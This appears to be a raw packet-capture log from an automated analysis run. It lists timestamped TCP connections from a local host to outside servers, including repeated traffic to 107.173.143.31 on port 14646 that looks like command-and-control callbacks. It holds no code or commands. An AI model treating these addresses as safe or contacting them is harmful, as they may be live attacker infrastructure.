                                                                                                                  Dec 16, 2024 07:15:32.571957111 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.572016954 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.572025061 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.572092056 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.578959942 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.579005003 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.579080105 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.579087973 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.579118013 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.579145908 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.587095022 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.587138891 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.587182999 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.587188959 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.587255955 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.587276936 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.595082998 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.595129967 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.595191002 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.595196962 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.595258951 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.603208065 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.603251934 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.603291988 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.603297949 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.603374004 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.610850096 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.610893011 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.610934973 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.610940933 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.610991955 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.618967056 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.619010925 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.619045019 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.619051933 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.619097948 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.625931025 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.625974894 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.626015902 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.626022100 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.626070976 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.764312029 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.764360905 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.764405012 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.764415979 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.764548063 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.764556885 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.772448063 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.772495985 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.772638083 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.772646904 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.779850006 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.779890060 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.779920101 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.779927969 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.779964924 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.787436962 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.787484884 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.787513018 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.787520885 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.787575006 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.789746046 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.789819956 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.789827108 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.789999962 CET44349742104.21.84.67192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.790057898 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:32.790338039 CET49742443192.168.2.5104.21.84.67
                                                                                                                  Dec 16, 2024 07:15:33.223287106 CET4975314646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:33.343269110 CET1464649753107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:33.343368053 CET4975314646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:33.347860098 CET4975314646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:33.467725992 CET1464649753107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:34.456809044 CET1464649753107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:34.509347916 CET4975314646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:34.689888954 CET1464649753107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:34.694027901 CET4975314646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:34.815207005 CET1464649753107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:34.815264940 CET4975314646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:34.935699940 CET1464649753107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:35.147054911 CET1464649753107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:35.148319960 CET4975314646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:35.268142939 CET1464649753107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:35.339956045 CET1464649753107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:35.347707987 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:35.384339094 CET4975314646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:35.467560053 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:35.467622995 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:35.470714092 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:35.519089937 CET4976080192.168.2.5178.237.33.50
                                                                                                                  Dec 16, 2024 07:15:35.590553999 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:35.639066935 CET8049760178.237.33.50192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:35.639127016 CET4976080192.168.2.5178.237.33.50
                                                                                                                  Dec 16, 2024 07:15:35.639398098 CET4976080192.168.2.5178.237.33.50
                                                                                                                  Dec 16, 2024 07:15:35.759180069 CET8049760178.237.33.50192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:36.586410999 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:36.634309053 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:36.828965902 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:36.834059000 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:36.888050079 CET8049760178.237.33.50192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:36.888216972 CET4976080192.168.2.5178.237.33.50
                                                                                                                  Dec 16, 2024 07:15:36.900943995 CET4975314646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:36.953919888 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:36.954142094 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.020740986 CET1464649753107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.073935986 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.297988892 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.298029900 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.298073053 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.298099041 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.298105955 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.298162937 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.298196077 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.298216105 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.298228979 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.298244953 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.298264027 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.299114943 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.306325912 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.306449890 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.306505919 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.314707041 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.314846039 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.314897060 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.490036011 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.490252972 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.492463112 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.493892908 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.494014025 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.494064093 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.501908064 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.502022982 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.502082109 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.509501934 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.509669065 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.509718895 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.517553091 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.517796993 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.517854929 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.525464058 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.525541067 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.525597095 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.533518076 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.533678055 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.533726931 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.541407108 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.541549921 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.541603088 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.549376011 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.549499035 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.549549103 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.557432890 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.557504892 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.557559013 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.565376043 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.565510988 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.565558910 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.573332071 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.573513031 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.573564053 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.682651043 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.682706118 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.682754040 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.685631990 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.685746908 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.685790062 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.692231894 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.692359924 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.692404985 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.698815107 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.698930025 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.698982954 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.704977036 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.705030918 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.705075026 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.711345911 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.711493015 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.711570978 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.717130899 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.717267036 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.717312098 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.723069906 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.723225117 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.723269939 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.729063034 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.729187965 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.729234934 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.734918118 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.735058069 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.735105991 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.740886927 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.740984917 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.741034031 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.746825933 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.746948004 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.746993065 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.752731085 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.752877951 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.752923012 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.758671045 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.758779049 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.758821964 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.764745951 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.764800072 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.765147924 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.770647049 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.770781040 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.770828009 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.777302027 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.777354956 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.777403116 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.782373905 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.782501936 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.782551050 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.788378000 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.788434982 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.788490057 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.794260979 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.794377089 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.794433117 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.800204992 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.800342083 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.800395012 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.806109905 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.806202888 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.806252956 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.874557018 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.874828100 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.874876022 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.876960039 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.877012968 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.877063036 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.880173922 CET8049760178.237.33.50192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.880235910 CET4976080192.168.2.5178.237.33.50
                                                                                                                  Dec 16, 2024 07:15:37.881763935 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.881887913 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.881937981 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.886576891 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.886720896 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.886765003 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.891417027 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.891535997 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.891578913 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.896048069 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.896207094 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.896250010 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.900513887 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.900625944 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.900681019 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.904853106 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.904984951 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.905030966 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.909154892 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.909207106 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.909254074 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.913343906 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.913464069 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.913508892 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.917488098 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.917541981 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.917589903 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.921509027 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.921618938 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.921667099 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.925344944 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.925470114 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.925532103 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.929265976 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.929318905 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.929364920 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.932965040 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.933078051 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.933126926 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.936789036 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.936877012 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.936922073 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.940462112 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.940608025 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.940654993 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.944197893 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.944288969 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.944344997 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.947864056 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.947958946 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.948010921 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.951550007 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.951672077 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.951719999 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.955256939 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.955390930 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.955436945 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.958971977 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.959100962 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.959152937 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.962672949 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.962820053 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.962867022 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.966355085 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.966495037 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.966542959 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.970125914 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.970208883 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.970258951 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.973815918 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.973893881 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.973943949 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:37.977467060 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:37.977583885 CET1464649759107.173.143.31192.168.2.5
